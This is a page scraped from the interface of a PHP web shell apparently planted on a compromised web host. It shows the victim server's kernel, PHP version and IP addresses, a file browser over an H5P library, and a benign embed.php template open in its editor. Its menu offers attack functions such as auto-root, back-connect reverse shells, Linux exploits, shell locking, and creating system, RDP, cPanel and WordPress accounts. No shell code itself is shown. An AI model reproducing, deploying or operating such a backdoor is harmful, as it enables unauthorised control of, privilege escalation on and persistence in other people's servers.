Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.100.201
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
hvp /
library /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
.gitignore
15
B
-rw-r--r--
.travis.yml
1.16
KB
-rw-r--r--
LICENSE.txt
34.32
KB
-rw-r--r--
README.txt
723
B
-rw-r--r--
composer.json
948
B
-rw-r--r--
embed.php
746
B
-rw-r--r--
h5p-default-storage.class.php
15.44
KB
-rw-r--r--
h5p-development.class.php
6.02
KB
-rw-r--r--
h5p-event-base.class.php
5.57
KB
-rw-r--r--
h5p-file-storage.interface.php
5.11
KB
-rw-r--r--
h5p-metadata.class.php
4.7
KB
-rw-r--r--
h5p.classes.php
187.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : embed.php
<!doctype html> <html lang="<?php print $lang; ?>" class="h5p-iframe"> <head> <meta charset="utf-8"> <title><?php print $content['title']; ?></title> <?php for ($i = 0, $s = count($scripts); $i < $s; $i++): ?> <script src="<?php print $scripts[$i]; ?>"></script> <?php endfor; ?> <?php for ($i = 0, $s = count($styles); $i < $s; $i++): ?> <link rel="stylesheet" href="<?php print $styles[$i]; ?>"> <?php endfor; ?> <?php if (!empty($additional_embed_head_tags)): print implode("\n", $additional_embed_head_tags); endif; ?> </head> <body> <div class="h5p-content" data-content-id="<?php print $content['id']; ?>"></div> <script> H5PIntegration = <?php print json_encode($integration); ?>; </script> </body> </html>
Close